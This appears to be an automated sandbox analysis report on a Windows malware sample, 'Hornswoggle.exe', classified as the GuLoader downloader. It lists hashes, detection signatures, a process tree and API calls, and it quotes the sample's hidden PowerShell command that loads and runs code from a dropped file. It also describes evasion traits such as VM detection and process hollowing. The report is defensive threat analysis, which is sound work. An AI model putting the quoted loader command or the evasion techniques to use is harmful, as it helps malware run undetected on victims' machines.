Edit tour

Windows Analysis Report
Hornswoggle.exe

Overview

General Information

Sample name:	Hornswoggle.exe
Analysis ID:	1583356
MD5:	46b874a16ba720eb5d39a0e7f9a87291
SHA1:	9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
SHA256:	da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c
Tags:	exeuser-malwarelabnet
Infos:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sample uses process hollowing technique

Suspicious powershell command line found

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Hornswoggle.exe (PID: 4996 cmdline: "C:\Users\user\Desktop\Hornswoggle.exe" MD5: 46B874A16BA720EB5D39A0E7F9A87291)

powershell.exe (PID: 6600 cmdline: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SIHClient.exe (PID: 2128 cmdline: C:\Windows\System32\sihclient.exe /cv 2NlF6XCJtk6pGjotHbf1og.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)

msiexec.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3292 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1272 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2300 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6004 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4676 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1492 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5240 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5176 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

dxdiag.exe (PID: 6208 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 1248 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 1716 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 4464 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 4072 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 3772 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 1360 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 5552 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 2468 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 5604 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

msiexec.exe (PID: 1308 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3184 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5784 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 5960 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6120 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6456 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1816 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

dxdiag.exe (PID: 1532 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 3192 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 2616 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 4256 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 1892 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4497282813.000000000BB30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hornswoggle.exe", ParentImage: C:\Users\user\Desktop\Hornswoggle.exe, ParentProcessId: 4996, ParentProcessName: Hornswoggle.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", ProcessId: 6600, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Hornswoggle.exe	ReversingLabs: Detection: 50%
Source: Hornswoggle.exe	Virustotal: Detection: 72%			Perma Link

Machine Learning detection for sample

Source: Hornswoggle.exe

Joe Sandbox ML: detected

Source: Hornswoggle.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Hornswoggle.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.4496761438.0000000008822000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %jqm.Core.pdb source: powershell.exe, 00000002.00000002.4496761438.0000000008822000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: powershell.exe, 00000002.00000002.4494109911.0000000007577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: SIHClient.exe, 00000004.00000002.2594005661.000001FC9B7C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftS
Source: powershell.exe, 00000002.00000002.4490074334.000000000318A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mp(
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: SIHClient.exe, 00000004.00000003.2214970112.000001FC9AF76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2214970112.000001FC9AF46000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2210737834.000001FC9AF76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2210737834.000001FC9AF46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8b8de9c
Source: Hornswoggle.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Hornswoggle.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.4490278168.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mi%.
Source: SIHClient.exe, 00000004.00000002.2594005661.000001FC9B7C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.E
Source: powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.M/
Source: powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c#
Source: powershell.exe, 00000002.00000002.4490278168.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.4490121510.00000000031D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5()T
Source: powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\Hornswoggle.exe

Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051BA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Hornswoggle.exe

Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040322B

Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPCD1B.tmp			Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPD4A9.tmp			Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_004049F9		0_2_004049F9
Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_004064AE		0_2_004064AE

Source: Hornswoggle.exe

Static PE information: invalid certificate

Source: Hornswoggle.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal76.troj.evad.winEXE@4406/21@0/0

Source: C:\Users\user\Desktop\Hornswoggle.exe

0_2_0040322B

Source: C:\Users\user\Desktop\Hornswoggle.exe

Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404486

Source: C:\Users\user\Desktop\Hornswoggle.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\Hornswoggle.exe

File created: C:\Users\user\AppData\Roaming\china

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\SIHClient.exe	Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:528:120:WilError_03

Source: C:\Users\user\Desktop\Hornswoggle.exe

File created: C:\Users\user\AppData\Local\Temp\nsr814D.tmp

Jump to behavior

Source: Hornswoggle.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Hornswoggle.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Hornswoggle.exe	ReversingLabs: Detection: 50%
Source: Hornswoggle.exe	Virustotal: Detection: 72%

Source: C:\Users\user\Desktop\Hornswoggle.exe

File read: C:\Users\user\Desktop\Hornswoggle.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Hornswoggle.exe "C:\Users\user\Desktop\Hornswoggle.exe"
Source: C:\Users\user\Desktop\Hornswoggle.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv 2NlF6XCJtk6pGjotHbf1og.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\Hornswoggle.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
